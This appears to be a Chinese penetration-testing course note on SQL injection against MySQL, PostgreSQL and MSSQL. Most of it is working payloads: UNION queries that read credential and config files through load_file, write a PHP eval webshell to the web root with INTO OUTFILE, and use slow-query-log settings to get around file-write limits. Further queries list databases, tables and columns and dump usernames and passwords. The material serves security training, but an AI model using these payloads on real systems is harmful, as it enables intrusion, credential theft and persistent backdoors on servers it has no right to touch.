《渗透测试》WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL 2022 Day25

1

 

 

mysql一些命令介绍

 

1 load_file() 

通过select load_file('xx.xx');读取文件

读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。 该文件所有字节可读，但文件内容必须小于max_allowed_packet。

如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。

其他利用方式：https://blog.csdn.net/god_7z1/article/details/6753071

MYSQL注入中，load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件，如：
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本

/etc/issue
/etc/issue.net
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\my.ini //MYSQL配置文件
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件

1.1 进入cmd

 

 1.2 因为数据库设置成secure_file_priv=NULL 无法显示数据因此要修改mysql.ini

 

 

1.3  执行命令，解决成功

 

 

1.4 读取文件

 

 

2 outfile

2.1 通过 select ‘xxx写入的内容' into outfile('文件路径)；将内容写入到指定文件中、

 

2.2 写入成功

 

 

 

2.3 若是写入到已存在文件会报错

 

 

 

 

#MYSQL-root高权限读写注入

-读取文件：

查看回显位置，发现在1,2处

 

 

UNION SELECT 1,load_file('d:/1.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

看到1 和456 其中456是D盘1.txt文件的内容

 

 

-写入文件：

UNION SELECT 1,'xxxx',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'd:/www.txt'

 

 union select 1,'<?php eval($_POST['x']);?>',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'D:/phpstudy/WWW/php/phpmysql/muma.php 

写入php一句话木马文件到指定路径下，用菜刀连接可以管理web

 

-路径获取：phpinfo,报错,字典等

-无法写入：secure_file_priv 突破 注入中需要支持SQL执行环境，没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过

set global slow_query_log=1; 开启慢日志

set global slow_query_log_file='shell路径';

select '<?php eval($_GET[A])?>' or SLEEP(1);

 

 

#PostgreSQL-高权限读写注入

-测列数：

order by 4

and 1=2 union select null,null,null,null

-测显位：第2，3

and 1=2 union select 'null',null,null,null 错误

and 1=2 union select null,null,null,null

and 1=2 union select null,null,'null',null 正常

and 1=2 union select null,null,null,'null' 错误

-获取信息：

and 1=2 UNION SELECT null,version(),null,null

and 1=2 UNION SELECT null,current_user,null,null

and 1=2 union select null,current_database(),null,null

-获取数据库名：

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

-获取表名：

1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'

2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

-获取列名：

and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

-获取数据：

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

-补充-获取dba用户（同样在DBA用户下，是可以进行文件读写的）：

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

参考：https://www.freebuf.com/sectool/249371.html

 

#MSSQL-sa高权限读写执行注入

-测列数：

order by 4

and 1=2 union all select null,null,null,null

-测显位：

and 1=2 union all select null,1,null,null

and 1=2 union all select null,null,'s',null

-获取信息：

@@version 获取版本信息

db_name() 当前数据库名字

user、system_user,current_user,user_name 获取当前用户名

@@SERVERNAME 获取服务器主机信息

and 1=2 union all select null,db_name(),null,null

-获取表名：

and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

-获取列名：

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null

and 1=2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

-获取数据：

and 1=2 union all select null,username, password ,null from manage